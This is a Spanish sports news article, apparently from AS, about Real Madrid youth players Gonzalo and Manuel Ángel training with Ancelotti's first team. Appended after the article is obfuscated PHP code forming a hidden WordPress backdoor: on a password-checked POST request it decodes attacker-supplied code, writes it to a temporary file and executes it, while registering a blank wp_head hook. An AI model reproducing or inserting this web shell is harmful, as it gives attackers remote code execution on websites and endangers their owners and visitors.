El ‘9’ es Gonzalo

El canterano se entrenó el lunes con el primer equipo: la pasada campaña logró 35 goles. Viene de firmar un doblete en la primera jornada del Castilla. Manuel Ángel también ilusiona.

“Esa es una pregunta para Ancelotti. Si está en esta plantilla y da este nivel, está más preparado que otros a día de hoy. Debe seguir su evolución. Tanto él como otros compañeros. Sin duda, el mejor del Castilla fue él con diferencia”. Esto dijo Raúl alabando a Gonzalo (19 años) en el Di Stéfano el pasado domingo tras el Castilla-Melilla (2-2). Los dos goles del filial blanco los anotó el chaval, que este pasado lunes ya se entrenó con el primer equipo debido a la ausencia de Vinicius y de recambios en los puestos de ataque… y que podría estar presente en la lista de convocados que Ancelotti dará este viernes después de la última sesión. Y es que el joven atacante no es un mero desconocido en Valdebebas.

El año pasado se convirtió en uno de los mejores jugadores del Juvenil A, al lograr 35 goles y seis asistencias en 43 encuentros (prácticamente contribuyó con un gol por partido jugado), a los que hay que sumar otro tanto y dos pases de gol con el Castilla. Su ausencia en el encuentro clave ante el Eldense, concentrado con la Selección española, fue determinante para no poder cumplir el sueño del ascenso. En Valdebebas no se veía marcar tantos goles a un mismo jugador desde que lo hiciera Mayoral en la campaña 2014-15, en la que el actual delantero del Getafe logró 42 tantos. Precisamente, el club azulón es el rival del los blancos este sábado (16:15 horas, Movistar LaLiga).

Esta Liga la ha empezado igual que la terminó: marcando. Gonzalo le dio la vuelta al partido ante el Melilla con dos golazos: el primero, al rematar de cabeza un preciso saque de esquina. Y el segundo, definiendo en el mano a mano. Ahora espera tener su oportunidad en el primer equipo…

Manuel Ángel pide paso

Además de Gonzalo, otro castillista se ejercitó con el primer equipo blanco: Manuel Ángel. El sevillano (es natural de Albaida del Aljarafe) también tiene 19 años y es un centrocampista de referencia. Con Arbeloa actuaba de ocho, siendo un futbolista clave a la hora de crear juego. Ya el año pasado entrenó alguna vez con Ancelotti, aunque debido a la gran cantidad de centrocampistas, no debutó. El italiano está mirando y mimando a la cantera en este comienzo de temporada. Sin ir más lejos, su compañero Nico Paz (18) ya estuvo presente en la pretemporada americana y ha viajado con el primer equipo tanto a Almería (jornada 2), como a Vigo (el pasado fin de semana).

El que se queda retrasado en esta carrera a largo plazo por tener ficha en el primer equipo es Álvaro Rodríguez (19). El delantero hispano-uruguayo, que rescató al Madrid de perder ante el Atlético de Madrid en el derbi liguero del pasado mes de febrero y de haber dado un par de asistencias una semana antes en Pamplona ante Osasuna. Pero no ha acabado de romper (sólo marcó dos goles después de su estreno en la máxima categoría) y continuará en la disciplina del Castilla por el momento…

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}